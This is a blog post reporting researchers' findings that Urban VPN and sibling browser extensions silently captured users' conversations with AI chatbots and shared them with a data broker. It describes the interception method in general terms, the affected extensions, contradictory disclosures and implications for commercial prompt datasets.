STORIES

Keller Maloney
Unusual - Founder
Dec 22, 2025
Security researchers at Koi Security published findings this week showing that since July 2025, the extension has been intercepting conversations across ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok, and Meta AI. Every prompt sent, every response received, timestamps, session metadata—all of it compressed, exfiltrated, and sold for "marketing analytics purposes."
How it works
The extension targets ten AI platforms. For each, it includes a dedicated "executor" script designed to intercept and capture conversations. When a user visits any of the targeted platforms, the extension injects a script directly into the page—chatgpt.js for ChatGPT, claude.js for Claude, and so on.
These injected scripts override fetch() and XMLHttpRequest—the fundamental browser APIs that handle all network requests. This means the extension intercepts raw API traffic before the browser even renders the conversation. The captured data is then packaged and transmitted to Urban VPN's servers at endpoints including analytics.urban-vpn.com and stats.urban-vpn.com.
The harvesting is enabled by default through hardcoded flags in the extension's configuration. There is no user-facing toggle to disable it. The data collection runs continuously in the background whether the VPN is connected or not. The only way to stop it is to uninstall the extension entirely.
The timeline
The AI conversation harvesting wasn't always present. Based on Koi's analysis, the capability was introduced in version 5.5.0, released on July 9, 2025. Earlier versions did not include this functionality.
Chrome and Edge extensions auto-update by default. Users who installed Urban VPN for its stated purpose—VPN functionality—woke up one day with new code silently harvesting their AI conversations. No notification, no new consent prompt, no indication anything had changed.
Anyone who used ChatGPT, Claude, Gemini, or the other targeted platforms while Urban VPN was installed after July 9, 2025 should assume those conversations are now on Urban VPN's servers and have been shared with third parties.
The "AI Protection" irony
Urban VPN's Chrome Web Store listing promotes "AI protection" as a feature: "Our VPN provides added security features to help shield your browsing experience from phishing attempts, malware, intrusive ads and AI protection which checks prompts for personal data (like an email or phone number), checks AI chat responses for suspicious or unsafe links and displays a warning before click or submit your prompt."
The framing suggests the AI monitoring exists to protect users. The code tells a different story.
The data collection and the "protection" notifications operate independently. Enabling or disabling the warning feature has no effect on whether conversations are captured and exfiltrated. The extension harvests everything regardless.
As Dardikman put it: "The extension warns you about sharing your email with ChatGPT while simultaneously exfiltrating your entire conversation to a data broker."
Where the data goes
Urban VPN is operated by Urban Cyber Security Inc., which is affiliated with BiScience (B.I Science (2009) Ltd.), a data broker company. BiScience has been on researchers' radar before. Security researchers at Secure Annex previously documented the company's data collection practices, establishing that BiScience collects browsing history tied to persistent device identifiers, provides an SDK to third-party extension developers to collect and sell user data, and monetizes this data through products like AdClarity and Clickstream OS.
Urban VPN's privacy policy confirms the relationship: "We share the Web Browsing Data with our affiliated company... BiScience that uses this raw data and creates insights which are commercially used and shared with Business Partners."
The policy also explicitly mentions AI data: "AI Inputs and Outputs. As part of the Browsing Data, we will collect the prompts and outputs queried by the End-User or generated by the AI chat provider, as applicable."
This represents an expansion of BiScience's operation—from collecting browsing history to harvesting complete AI conversations, a significantly more sensitive category of data.
Scale: 8 million users affected
After documenting Urban VPN Proxy's behavior, Koi checked whether the same code existed elsewhere. The identical AI harvesting functionality appears in seven other extensions from the same publisher, across both Chrome and Edge:
Chrome Web Store:
Urban VPN Proxy – 6,000,000 users
1ClickVPN Proxy – 600,000 users
Urban Browser Guard – 40,000 users
Urban Ad Blocker – 10,000 users
Microsoft Edge Add-ons:
Urban VPN Proxy – 1,323,622 users
1ClickVPN Proxy – 36,459 users
Urban Browser Guard – 12,624 users
Urban Ad Blocker – 6,476 users
Total affected users: over 8 million.
The extensions span different product categories—a VPN, an ad blocker, a "browser guard" security tool—but share the same surveillance backend. Users installing an ad blocker have no reason to expect their Claude conversations are being harvested.
All of these extensions carry "Featured" badges from their respective stores, except Urban Ad Blocker for Edge. These badges signal to users that the extensions have been reviewed and meet platform quality standards.
The disclosure problem
Urban VPN does disclose some of this—buried in its privacy policy and consent prompts. The consent prompt shown during extension setup mentions that the extension processes "ChatAI communication" along with "pages you visit" and "security signals," stating this is done "to provide these protections."
But the Chrome Web Store listing—the place where users actually decide whether to install—shows a different picture: "This developer declares that your data is Not being sold to third parties, outside of the approved use cases."
The contradictions are significant. The consent prompt frames AI monitoring as protective; the privacy policy reveals the data is sold for marketing. The store listing says data isn't sold to third parties; the privacy policy describes sharing with BiScience and "Business Partners." Users who installed before July 2025 never saw updated consent language—the AI harvesting was added via silent update.
Even users who see the consent prompt have no granular control. It's all or nothing.
Google's role
Urban VPN Proxy carries Google's "Featured" badge. According to Google's documentation: "Featured extensions follow our technical best practices and meet a high standard of user experience and design" and "Before it receives a Featured badge, the Chrome Web Store team must review each extension."
A human at Google reviewed Urban VPN Proxy and concluded it met their standards. Either the review didn't examine the code that harvests conversations from Google's own AI product (Gemini), or it did and didn't consider this a problem.
The Chrome Web Store's Limited Use policy explicitly prohibits "transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers." BiScience is, by its own description, a data broker.
The extensions remain live as of this writing.
Implications for prompt datasets
There's another dimension to this story that matters for anyone in marketing or AI optimization.
Many AEO and GEO tools pitch access to "real prompt data"—the actual queries people type into ChatGPT, so marketers can optimize for those prompts. OpenAI doesn't release this data. (Thank god—imagine how much personal information is in the average ChatGPT history.) So where do these datasets come from?
Now we know one answer: eavesdropping on users who thought they were protected.
The ethics here are obvious. But there's also a methodological problem. These datasets are hopelessly biased—they represent only the conversations of people who happened to install shady VPN extensions. For most companies, the overlap between this demographic and their actual customers is minimal. Drawing conclusions about "what people are asking AI" from this sample is like surveying only people who respond to phone calls from unknown numbers and extrapolating to the general population.
If a tool promises insight into "real user prompts," it's worth asking where they came from—and whether that sample has anything to do with the people you're actually trying to reach.
The original technical research was conducted by Idan Dardikman and the team at Koi Security. Their full writeup contains additional technical details and indicators of compromise.
Careers
Ideas
Legal


